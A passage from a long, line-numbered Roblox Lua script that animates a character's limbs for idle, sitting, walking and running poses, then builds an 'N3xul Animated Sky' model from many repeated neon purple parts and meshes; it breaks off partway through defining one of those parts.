  5366. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14+1*math.cos(sine/14)),math.rad(40),0), 0.2)
  5367. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-40), 0), 0.2)
  5368. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.15, -3, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
  5369. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.15, -3, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
  5370. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  5371. elseif stanceToggle == "Sitting" then
  5372. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, .9, 0) * CFrame.Angles(math.rad(100-1*math.cos(sine/14)), math.rad(0), math.rad(20)), 0.2)
  5373. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, .9, 0)*CFrame.Angles(math.rad(-36+1*math.cos(sine/14)), math.rad(0), math.rad(-30)), 0.2)
  5374. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0, 3, -.3) * CFrame.Angles(math.rad(-14+1*math.cos(sine/14)), math.rad(0), math.rad(0)),0.2)
  5375. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -2.8, 0) * CFrame.Angles(math.rad(-10+1*math.cos(sine/14)), 0, math.rad(0)), 0.2)
  5376. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -1, -2) * CFrame.Angles(math.rad(-10-1*math.cos(sine/14)), 0, 0), 0.2)
  5377. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3, .6) * CFrame.Angles(math.rad(-50-1*math.cos(sine/14)), 0, 0), 0.2)
  5378. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5379. elseif stanceToggle == "Normal2" then
  5380. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3,.9,0)*CFrame.Angles(math.rad(30+2*math.cos(sine/14)),math.rad(40),math.rad(40)), 0.2)
  5381. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3,.9+0.1*math.cos(sine/14),0)*CFrame.Angles(math.rad(-20),math.rad(30),math.rad(-40-2*math.cos(sine/14))), 0.2)
  5382. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14+1*math.cos(sine/14)),math.rad(-40),0), 0.2)
  5383. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(40), 0), 0.2)
  5384. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1.2, -3, 0) * CFrame.Angles(math.rad(-16), math.rad(-20), math.rad(-14)), 0.2)
  5385. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1.2, -3, 0) * CFrame.Angles(math.rad(10), math.rad(-30), math.rad(18)), 0.2)
  5386. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.9, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5387. end
  5388. elseif animpose == "Walking" then
  5389. if stanceToggle == "Normal" then
  5390. change = 1
  5391. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, .9+.1*math.cos(sine/7), 0) * CFrame.Angles(math.rad(90+2*math.cos(sine/7)), math.rad(0), math.rad(20)), 0.2)
  5392. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, .9+.1*math.cos(sine/7), -math.sin(sine/14)/2)*CFrame.Angles(math.sin(sine/14)/4, math.rad(1) + -math.sin(sine/14)/2, math.rad(-30)), 0.2)
  5393. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(-8+2*math.cos(sine/7)), math.rad(0-8*math.cos(sine/14)), math.rad(0)),0.2)
  5394. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1+0.1*math.cos(sine/7), 0) * CFrame.Angles(math.rad(-4+2*math.cos(sine/7)), math.rad(0+8*math.cos(sine/14)), math.rad(0)), 0.2)
  5395. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3-0.3*math.cos(sine/14)/2, -.05 + math.sin(sine/14)/2) * CFrame.Angles(math.rad(-12) + -math.sin(sine/14)/2, math.rad(0-8*math.cos(sine/14)), 0), .4)
  5396. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3+0.3*math.cos(sine/14)/2, -.05 + -math.sin(sine/14)/2) * CFrame.Angles(math.rad(-12) + math.sin(sine/14)/2, math.rad(0-8*math.cos(sine/14)), 0), .4)
  5397. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(-90), math.rad(-110), math.rad(-70)), 1)
  5398. elseif stanceToggle == "Normal2" then
  5399. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, .9+.1*math.cos(sine/7), math.sin(sine/14)/2)*CFrame.Angles(-math.sin(sine/14)/4, -math.sin(sine/14)/2, math.rad(20)), 0.2)
  5400. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, .9+.1*math.cos(sine/7), -math.sin(sine/14)/2)*CFrame.Angles(math.sin(sine/14)/4, -math.sin(sine/14)/2, math.rad(-20)), 0.2)
  5401. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(-8+2*math.cos(sine/7)), math.rad(0), math.rad(0)),0.2)
  5402. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1+0.1*math.cos(sine/7), 0) * CFrame.Angles(math.rad(-4+2*math.cos(sine/7)), 0, math.rad(0)), 0.2)
  5403. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3-0.3*math.cos(sine/14)/2, -.05 + math.sin(sine/14)/2) * CFrame.Angles(math.rad(-18) + -math.sin(sine/14)/2.3, 0, 0), .4)
  5404. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3+0.3*math.cos(sine/14)/2, -.05 + -math.sin(sine/14)/2) * CFrame.Angles(math.rad(-18) + math.sin(sine/14)/2.3, 0, 0), .4)
  5405. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.9, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5406. end
  5407. elseif animpose == "Running" then
  5408. change = 1
  5409. rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(3, 0.9, .5) * CFrame.Angles(math.rad(-10-20*math.cos(sine/4)/2), math.rad(-40+10*math.cos(sine/4)/2), math.rad(50-10*math.cos(sine/4)/2)), 0.2)
  5410. larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-3, 0.9, .5)*CFrame.Angles(math.rad(10+20*math.cos(sine/4)/2), math.rad(40-10*math.cos(sine/4)/2), math.rad(-50+10*math.cos(sine/4)/2)), 0.2)
  5411. hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,3,0)*CFrame.Angles(math.rad(6+6*math.cos(sine/4)/1.8), math.rad(0), math.rad(0)),0.2)
  5412. torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1+0.2*math.cos(sine/4)/2, 0) * CFrame.Angles(math.rad(-14+10*math.cos(sine/4)/2), 0, math.rad(0)), 0.2)
  5413. lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-1, -3-0.44*math.cos(sine/8)/2.4, -.15 + math.sin(sine/8)/1.5) * CFrame.Angles(math.rad(-20) + -math.sin(sine/8)/1.7, 0, 0), .4)
  5414. rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(1, -3+0.44*math.cos(sine/8)/2.4, -.15 + -math.sin(sine/8)/1.5) * CFrame.Angles(math.rad(-20) + math.sin(sine/8)/1.7, 0, 0), .4)
  5415. cor.Weld.C0 = Lerp(cor.Weld.C0, CFrame.new(0, -1.85, -.9) * CFrame.Angles(math.rad(-90), math.rad(-90), math.rad(0)), 1)
  5416. end
  5417. end
  5418. och=och+1
  5419. for _,v in pairs(orbt) do
  5420. pcall(function()
  5421. v.Mesh.Scale=Vector3.new(cns+(0.2*math.cos(och/12)),cns+(0.2*math.cos(och/10)),cns+(0.2*math.cos(och/8)))
  5422. end)
  5423. end
  5424. for _,v in pairs(stlt) do
  5425. pcall(function()
  5426. v.CFrame=larm.CFrame*CFrame.new(0,-3.5-(cns/2),-0.1)
  5427. end)
  5428. end
  5429. for _,v in pairs(chot) do
  5430. pcall(function()
  5431. v.CFrame=Lerp(v.CFrame,cnOrb.CFrame,0.1)
  5432. v.Mesh.Scale=Vector3.new(Tween(v.Mesh.Scale.X,0,0.1),Tween(v.Mesh.Scale.Y,0,0.1),Tween(v.Mesh.Scale.Z,0,0.1))
  5433. end)
  5434. end
  5435. for _,v in pairs(cfxt) do
  5436. pcall(function()
  5437. local vs=v.Mesh.Scale
  5438. v.Mesh.Scale=Vector3.new(vs.x+0.5,vs.y+0.1,vs.z+0.5)
  5439. v.Transparency=v.Transparency+0.05
  5440. end)
  5441. end
  5442. for _,v in pairs(pfxt) do
  5443. pcall(function()
  5444. local vs=v.Mesh.Scale
  5445. v.Mesh.Scale=Vector3.new(vs.x+2,vs.y+0.5,vs.z+2)
  5446. v.Transparency=v.Transparency+0.025
  5447. end)
  5448. end
  5449. end)
  5450. --N3xul Animated Sky
  5451. local runDummyScript = function(f,scri)
  5452. local oldenv = getfenv(f)
  5453. local newenv = setmetatable({}, {
  5454. __index = function(_, k)
  5455. if k:lower() == 'script' then
  5456. return scri
  5457. else
  5458. return oldenv[k]
  5459. end
  5460. end
  5461. })
  5462. setfenv(f, newenv)
  5463. ypcall(function() f() end)
  5464. end
  5465. cors = {}
  5466. mas = Instance.new("Model",game:GetService("Lighting"))
  5467. mas.Name = "CompiledModel"
  5468. o1 = Instance.new("Model")
  5469. o2 = Instance.new("Model")
  5470. o3 = Instance.new("Part")
  5471. o4 = Instance.new("SpecialMesh")
  5472. o5 = Instance.new("Part")
  5473. o6 = Instance.new("SpecialMesh")
  5474. o7 = Instance.new("Part")
  5475. o8 = Instance.new("SpecialMesh")
  5476. o9 = Instance.new("Part")
  5477. o10 = Instance.new("SpecialMesh")
  5478. o11 = Instance.new("Part")
  5479. o12 = Instance.new("SpecialMesh")
  5480. o13 = Instance.new("Part")
  5481. o14 = Instance.new("SpecialMesh")
  5482. o15 = Instance.new("Part")
  5483. o16 = Instance.new("SpecialMesh")
  5484. o17 = Instance.new("Part")
  5485. o18 = Instance.new("SpecialMesh")
  5486. o19 = Instance.new("Part")
  5487. o20 = Instance.new("SpecialMesh")
  5488. o21 = Instance.new("Part")
  5489. o22 = Instance.new("SpecialMesh")
  5490. o23 = Instance.new("Part")
  5491. o24 = Instance.new("SpecialMesh")
  5492. o25 = Instance.new("Part")
  5493. o26 = Instance.new("SpecialMesh")
  5494. o27 = Instance.new("Part")
  5495. o28 = Instance.new("SpecialMesh")
  5496. o29 = Instance.new("Part")
  5497. o30 = Instance.new("SpecialMesh")
  5498. o31 = Instance.new("Part")
  5499. o32 = Instance.new("SpecialMesh")
  5500. o33 = Instance.new("Part")
  5501. o34 = Instance.new("SpecialMesh")
  5502. o35 = Instance.new("Part")
  5503. o36 = Instance.new("SpecialMesh")
  5504. o37 = Instance.new("Part")
  5505. o38 = Instance.new("SpecialMesh")
  5506. o39 = Instance.new("Part")
  5507. o40 = Instance.new("SpecialMesh")
  5508. o41 = Instance.new("Part")
  5509. o42 = Instance.new("SpecialMesh")
  5510. o43 = Instance.new("Part")
  5511. o44 = Instance.new("SpecialMesh")
  5512. o45 = Instance.new("Part")
  5513. o46 = Instance.new("SpecialMesh")
  5514. o47 = Instance.new("Part")
  5515. o48 = Instance.new("SpecialMesh")
  5516. o49 = Instance.new("Part")
  5517. o50 = Instance.new("SpecialMesh")
  5518. o51 = Instance.new("Part")
  5519. o52 = Instance.new("SpecialMesh")
  5520. o53 = Instance.new("Part")
  5521. o54 = Instance.new("SpecialMesh")
  5522. o55 = Instance.new("Part")
  5523. o56 = Instance.new("SpecialMesh")
  5524. o57 = Instance.new("Part")
  5525. o58 = Instance.new("SpecialMesh")
  5526. o59 = Instance.new("Part")
  5527. o60 = Instance.new("SpecialMesh")
  5528. o61 = Instance.new("Part")
  5529. o62 = Instance.new("SpecialMesh")
  5530. o63 = Instance.new("Part")
  5531. o64 = Instance.new("SpecialMesh")
  5532. o65 = Instance.new("Part")
  5533. o66 = Instance.new("SpecialMesh")
  5534. o67 = Instance.new("Script")
  5535. o1.Name = "$_N3xul Sky"
  5536. o1.Parent = mas
  5537. o2.Name = "SKY IS DA LIMIT"
  5538. o2.Parent = o1
  5539. o3.Name = "Brick"
  5540. o3.Parent = o2
  5541. o3.Material = Enum.Material.Neon
  5542. o3.BrickColor = BrickColor.new("Royal purple")
  5543. o3.Position = Vector3.new(3.5, 1.66253495, -1.5)
  5544. o3.Rotation = Vector3.new(96.8799973, 29.4200001, 64.2200012)
  5545. o3.Anchored = true
  5546. o3.CanCollide = false
  5547. o3.Size = Vector3.new(1, 2.4000001, 1)
  5548. o3.CFrame = CFrame.new(3.5, 1.66253495, -1.5, 0.378833085, -0.784395874, 0.49113974, 0.104257114, -0.491143882, -0.864818215, 0.919577479, 0.378825694, -0.104285136)
  5549. o3.BottomSurface = Enum.SurfaceType.Smooth
  5550. o3.TopSurface = Enum.SurfaceType.Smooth
  5551. o3.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5552. o3.Position = Vector3.new(3.5, 1.66253495, -1.5)
  5553. o3.Orientation = Vector3.new(59.8600006, 101.989998, 168.020004)
  5554. o3.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5555. o4.Parent = o3
  5556. o4.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5557. o4.Offset = Vector3.new(2, 2, 2)
  5558. o4.Scale = Vector3.new(1000, 1000, 1000)
  5559. o4.VertexColor = Vector3.new(0.300000012, 4, 9)
  5560. o4.MeshType = Enum.MeshType.FileMesh
  5561. o4.Scale = Vector3.new(1000, 1000, 1000)
  5562. o5.Name = "Brick"
  5563. o5.Parent = o2
  5564. o5.Material = Enum.Material.Neon
  5565. o5.BrickColor = BrickColor.new("Royal purple")
  5566. o5.Position = Vector3.new(3.618927, 3.53207898, -2.67700195)
  5567. o5.Rotation = Vector3.new(55.5499992, -81.6699982, 96.1299973)
  5568. o5.Anchored = true
  5569. o5.CanCollide = false
  5570. o5.Size = Vector3.new(1, 2.4000001, 1)
  5571. o5.CFrame = CFrame.new(3.618927, 3.53207898, -2.67700195, -0.0154758478, -0.144104496, -0.989441693, 0.649552941, 0.750867248, -0.119519472, 0.760160863, -0.644543171, 0.0819826573)
  5572. o5.BottomSurface = Enum.SurfaceType.Smooth
  5573. o5.TopSurface = Enum.SurfaceType.Smooth
  5574. o5.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5575. o5.Position = Vector3.new(3.618927, 3.53207898, -2.67700195)
  5576. o5.Orientation = Vector3.new(6.86000013, -85.2600021, 40.8600006)
  5577. o5.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5578. o6.Parent = o5
  5579. o6.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5580. o6.Offset = Vector3.new(2, 2, 2)
  5581. o6.Scale = Vector3.new(1000, 1000, 1000)
  5582. o6.VertexColor = Vector3.new(0.300000012, 4, 9)
  5583. o6.MeshType = Enum.MeshType.FileMesh
  5584. o6.Scale = Vector3.new(1000, 1000, 1000)
  5585. o7.Name = "Brick"
  5586. o7.Parent = o2
  5587. o7.Material = Enum.Material.Neon
  5588. o7.BrickColor = BrickColor.new("Royal purple")
  5589. o7.Position = Vector3.new(3.41925001, 3.46374989, -2.55004907)
  5590. o7.Rotation = Vector3.new(60.2599983, -71.0599976, 96.9499969)
  5591. o7.Anchored = true
  5592. o7.CanCollide = false
  5593. o7.Size = Vector3.new(1, 2.4000001, 1)
  5594. o7.CFrame = CFrame.new(3.41925001, 3.46374989, -2.55004907, -0.0392630808, -0.322262198, -0.945838571, 0.591747701, 0.755236924, -0.281889617, 0.80517143, -0.570765078, 0.161043555)
  5595. o7.BottomSurface = Enum.SurfaceType.Smooth
  5596. o7.TopSurface = Enum.SurfaceType.Smooth
  5597. o7.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5598. o7.Position = Vector3.new(3.41925001, 3.46374989, -2.55004907)
  5599. o7.Orientation = Vector3.new(16.3700008, -80.3399963, 38.0800018)
  5600. o7.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5601. o8.Parent = o7
  5602. o8.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5603. o8.Offset = Vector3.new(2, 2, 2)
  5604. o8.Scale = Vector3.new(1000, 1000, 1000)
  5605. o8.VertexColor = Vector3.new(0.300000012, 4, 9)
  5606. o8.MeshType = Enum.MeshType.FileMesh
  5607. o8.Scale = Vector3.new(1000, 1000, 1000)
  5608. o9.Name = "Brick"
  5609. o9.Parent = o2
  5610. o9.Material = Enum.Material.Neon
  5611. o9.BrickColor = BrickColor.new("Royal purple")
  5612. o9.Position = Vector3.new(3.24560499, 3.35655093, -2.41162109)
  5613. o9.Rotation = Vector3.new(63.0400009, -60.4500008, 95.7099991)
  5614. o9.Anchored = true
  5615. o9.CanCollide = false
  5616. o9.Size = Vector3.new(1, 2.4000001, 1)
  5617. o9.CFrame = CFrame.new(3.24560499, 3.35655093, -2.41162109, -0.0490314811, -0.490668416, -0.86996752, 0.528260767, 0.726481915, -0.439518034, 0.847669482, -0.481119365, 0.223578453)
  5618. o9.BottomSurface = Enum.SurfaceType.Smooth
  5619. o9.TopSurface = Enum.SurfaceType.Smooth
  5620. o9.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5621. o9.Position = Vector3.new(3.24560499, 3.35655093, -2.41162109)
  5622. o9.Orientation = Vector3.new(26.0699997, -75.5899963, 36.0200005)
  5623. o9.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5624. o10.Parent = o9
  5625. o10.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5626. o10.Offset = Vector3.new(2, 2, 2)
  5627. o10.Scale = Vector3.new(1000, 1000, 1000)
  5628. o10.VertexColor = Vector3.new(0.300000012, 4, 9)
  5629. o10.MeshType = Enum.MeshType.FileMesh
  5630. o10.Scale = Vector3.new(1000, 1000, 1000)
  5631. o11.Name = "Brick"
  5632. o11.Parent = o2
  5633. o11.Material = Enum.Material.Neon
  5634. o11.BrickColor = BrickColor.new("Royal purple")
  5635. o11.Position = Vector3.new(3.16018701, 2.01041889, -1.56359899)
  5636. o11.Rotation = Vector3.new(84.7699966, 11.3299999, 76.1299973)
  5637. o11.Anchored = true
  5638. o11.CanCollide = false
  5639. o11.Size = Vector3.new(1, 2.4000001, 1)
  5640. o11.CFrame = CFrame.new(3.16018701, 2.01041889, -1.56359899, 0.234984711, -0.951925099, 0.196545079, 0.135413677, -0.168172807, -0.976414025, 0.962523997, 0.256055504, 0.0893825442)
  5641. o11.BottomSurface = Enum.SurfaceType.Smooth
  5642. o11.TopSurface = Enum.SurfaceType.Smooth
  5643. o11.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5644. o11.Position = Vector3.new(3.16018701, 2.01041889, -1.56359899)
  5645. o11.Orientation = Vector3.new(77.5299988, 65.5500031, 141.160004)
  5646. o11.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5647. o12.Parent = o11
  5648. o12.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5649. o12.Offset = Vector3.new(2, 2, 2)
  5650. o12.Scale = Vector3.new(1000, 1000, 1000)
  5651. o12.VertexColor = Vector3.new(0.300000012, 4, 9)
  5652. o12.MeshType = Enum.MeshType.FileMesh
  5653. o12.Scale = Vector3.new(1000, 1000, 1000)
  5654. o13.Name = "Brick"
  5655. o13.Parent = o2
  5656. o13.Material = Enum.Material.Neon
  5657. o13.BrickColor = BrickColor.new("Royal purple")
  5658. o13.Position = Vector3.new(3.31469703, 1.82450104, -1.51757801)
  5659. o13.Rotation = Vector3.new(90.1399994, 20.6700001, 70.8600006)
  5660. o13.Anchored = true
  5661. o13.CanCollide = false
  5662. o13.Size = Vector3.new(1, 2.4000001, 1)
  5663. o13.CFrame = CFrame.new(3.31469703, 1.82450104, -1.51757801, 0.306727529, -0.883943498, 0.352943659, 0.113343202, -0.334257245, -0.935642958, 0.945028484, 0.32698974, -0.00233911769)
  5664. o13.BottomSurface = Enum.SurfaceType.Smooth
  5665. o13.TopSurface = Enum.SurfaceType.Smooth
  5666. o13.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5667. o13.Position = Vector3.new(3.31469703, 1.82450104, -1.51757801)
  5668. o13.Orientation = Vector3.new(69.3300018, 90.3799973, 161.270004)
  5669. o13.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5670. o14.Parent = o13
  5671. o14.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5672. o14.Offset = Vector3.new(2, 2, 2)
  5673. o14.Scale = Vector3.new(1000, 1000, 1000)
  5674. o14.VertexColor = Vector3.new(0.300000012, 4, 9)
  5675. o14.MeshType = Enum.MeshType.FileMesh
  5676. o14.Scale = Vector3.new(1000, 1000, 1000)
  5677. o15.Name = "Brick"
  5678. o15.Parent = o2
  5679. o15.Material = Enum.Material.Neon
  5680. o15.BrickColor = BrickColor.new("Royal purple")
  5681. o15.Position = Vector3.new(4.57440186, 1.39447999, -1.79949903)
  5682. o15.Rotation = Vector3.new(160.410004, 49.5999985, 1.05999994)
  5683. o15.Anchored = true
  5684. o15.CanCollide = false
  5685. o15.Size = Vector3.new(1, 2.4000001, 1)
  5686. o15.CFrame = CFrame.new(4.57440186, 1.39447999, -1.79949903, 0.64802295, -0.0120393187, 0.761527359, 0.237799332, -0.946695745, -0.217319146, 0.7235502, 0.321917951, -0.610618293)
  5687. o15.BottomSurface = Enum.SurfaceType.Smooth
  5688. o15.TopSurface = Enum.SurfaceType.Smooth
  5689. o15.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5690. o15.Position = Vector3.new(4.57440186, 1.39447999, -1.79949903)
  5691. o15.Orientation = Vector3.new(12.5500002, 128.720001, 165.899994)
  5692. o15.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5693. o16.Parent = o15
  5694. o16.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5695. o16.Offset = Vector3.new(2, 2, 2)
  5696. o16.Scale = Vector3.new(1000, 1000, 1000)
  5697. o16.VertexColor = Vector3.new(0.300000012, 4, 9)
  5698. o16.MeshType = Enum.MeshType.FileMesh
  5699. o16.Scale = Vector3.new(1000, 1000, 1000)
  5700. o17.Name = "Brick"
  5701. o17.Parent = o2
  5702. o17.Material = Enum.Material.Neon
  5703. o17.BrickColor = BrickColor.new("Royal purple")
  5704. o17.Position = Vector3.new(2.94677711, 2.85119104, -1.97851598)
  5705. o17.Rotation = Vector3.new(70.6100006, -28.9300003, 89.6299973)
  5706. o17.Anchored = true
  5707. o17.CanCollide = false
  5708. o17.Size = Vector3.new(1, 2.4000001, 1)
  5709. o17.CFrame = CFrame.new(2.94677711, 2.85119104, -1.97851598, 0.00562491454, -0.875205159, -0.483721107, 0.328991413, 0.458422065, -0.825601816, 0.944317937, -0.154494658, 0.290510803)
  5710. o17.BottomSurface = Enum.SurfaceType.Smooth
  5711. o17.TopSurface = Enum.SurfaceType.Smooth
  5712. o17.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5713. o17.Position = Vector3.new(2.94677711, 2.85119104, -1.97851598)
  5714. o17.Orientation = Vector3.new(55.6500015, -59.0099983, 35.6699982)
  5715. o17.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5716. o18.Parent = o17
  5717. o18.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5718. o18.Offset = Vector3.new(2, 2, 2)
  5719. o18.Scale = Vector3.new(1000, 1000, 1000)
  5720. o18.VertexColor = Vector3.new(0.300000012, 4, 9)
  5721. o18.MeshType = Enum.MeshType.FileMesh
  5722. o18.Scale = Vector3.new(1000, 1000, 1000)
  5723. o19.Name = "Brick"
  5724. o19.Parent = o2
  5725. o19.Material = Enum.Material.Neon
  5726. o19.BrickColor = BrickColor.new("Royal purple")
  5727. o19.Position = Vector3.new(3.00463891, 3.044065, -2.12027001)
  5728. o19.Rotation = Vector3.new(68, -39.3699989, 91.9400024)
  5729. o19.Anchored = true
  5730. o19.CanCollide = false
  5731. o19.Size = Vector3.new(1, 2.4000001, 1)
  5732. o19.CFrame = CFrame.new(3.00463891, 3.044065, -2.12027001, -0.0261950977, -0.772609949, -0.634342492, 0.394283026, 0.575135231, -0.716777742, 0.918619871, -0.26888746, 0.289558738)
  5733. o19.BottomSurface = Enum.SurfaceType.Smooth
  5734. o19.TopSurface = Enum.SurfaceType.Smooth
  5735. o19.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5736. o19.Position = Vector3.new(3.00463891, 3.044065, -2.12027001)
  5737. o19.Orientation = Vector3.new(45.7900009, -65.4599991, 34.4300003)
  5738. o19.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5739. o20.Parent = o19
  5740. o20.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5741. o20.Offset = Vector3.new(2, 2, 2)
  5742. o20.Scale = Vector3.new(1000, 1000, 1000)
  5743. o20.VertexColor = Vector3.new(0.300000012, 4, 9)
  5744. o20.MeshType = Enum.MeshType.FileMesh
  5745. o20.Scale = Vector3.new(1000, 1000, 1000)
  5746. o21.Name = "Brick"
  5747. o21.Parent = o2
  5748. o21.Material = Enum.Material.Neon
  5749. o21.BrickColor = BrickColor.new("Royal purple")
  5750. o21.Position = Vector3.new(3.10595703, 3.21490192, -2.26617408)
  5751. o21.Rotation = Vector3.new(65.5299988, -49.8899994, 93.9800034)
  5752. o21.Anchored = true
  5753. o21.CanCollide = false
  5754. o21.Size = Vector3.new(1, 2.4000001, 1)
  5755. o21.CFrame = CFrame.new(3.10595703, 3.21490192, -2.26617408, -0.0446844138, -0.642767787, -0.764757931, 0.46155408, 0.665641308, -0.586429715, 0.88599056, -0.37918207, 0.26692614)
  5756. o21.BottomSurface = Enum.SurfaceType.Smooth
  5757. o21.TopSurface = Enum.SurfaceType.Smooth
  5758. o21.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5759. o21.Position = Vector3.new(3.10595703, 3.21490192, -2.26617408)
  5760. o21.Orientation = Vector3.new(35.9000015, -70.7600021, 34.7400017)
  5761. o21.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5762. o22.Parent = o21
  5763. o22.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5764. o22.Offset = Vector3.new(2, 2, 2)
  5765. o22.Scale = Vector3.new(1000, 1000, 1000)
  5766. o22.VertexColor = Vector3.new(0.300000012, 4, 9)
  5767. o22.MeshType = Enum.MeshType.FileMesh
  5768. o22.Scale = Vector3.new(1000, 1000, 1000)
  5769. o23.Name = "Brick"
  5770. o23.Parent = o2
  5771. o23.Material = Enum.Material.Neon
  5772. o23.BrickColor = BrickColor.new("Royal purple")
  5773. o23.Position = Vector3.new(2.93334889, 2.64311099, -1.84747303)
  5774. o23.Rotation = Vector3.new(73.4700012, -18.5900002, 87.0100021)
  5775. o23.Anchored = true
  5776. o23.CanCollide = false
  5777. o23.Size = Vector3.new(1, 2.4000001, 1)
  5778. o23.CFrame = CFrame.new(2.93334889, 2.64311099, -1.84747303, 0.0495064296, -0.946529031, -0.318804532, 0.268211812, 0.320073038, -0.908636391, 0.962090611, -0.0405250117, 0.269712627)
  5779. o23.BottomSurface = Enum.SurfaceType.Smooth
  5780. o23.TopSurface = Enum.SurfaceType.Smooth
  5781. o23.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5782. o23.Position = Vector3.new(2.93334889, 2.64311099, -1.84747303)
  5783. o23.Orientation = Vector3.new(65.3199997, -49.7700005, 39.9599991)
  5784. o23.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5785. o24.Parent = o23
  5786. o24.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5787. o24.Offset = Vector3.new(2, 2, 2)
  5788. o24.Scale = Vector3.new(1000, 1000, 1000)
  5789. o24.VertexColor = Vector3.new(0.300000012, 4, 9)
  5790. o24.MeshType = Enum.MeshType.FileMesh
  5791. o24.Scale = Vector3.new(1000, 1000, 1000)
  5792. o25.Name = "Brick"
  5793. o25.Parent = o2
  5794. o25.Material = Enum.Material.Neon
  5795. o25.BrickColor = BrickColor.new("Royal purple")
  5796. o25.Position = Vector3.new(2.965698, 2.42810798, -1.73171997)
  5797. o25.Rotation = Vector3.new(76.6699982, -8.39000034, 83.9700012)
  5798. o25.Anchored = true
  5799. o25.CanCollide = false
  5800. o25.Size = Vector3.new(1, 2.4000001, 1)
  5801. o25.CFrame = CFrame.new(2.965698, 2.42810798, -1.73171997, 0.103865072, -0.983827293, -0.14595513, 0.214386716, 0.165448487, -0.962637901, 0.971214116, 0.0686925501, 0.22809954)
  5802. o25.BottomSurface = Enum.SurfaceType.Smooth
  5803. o25.TopSurface = Enum.SurfaceType.Smooth
  5804. o25.Color = Color3.new(0.384314, 0.145098, 0.819608)
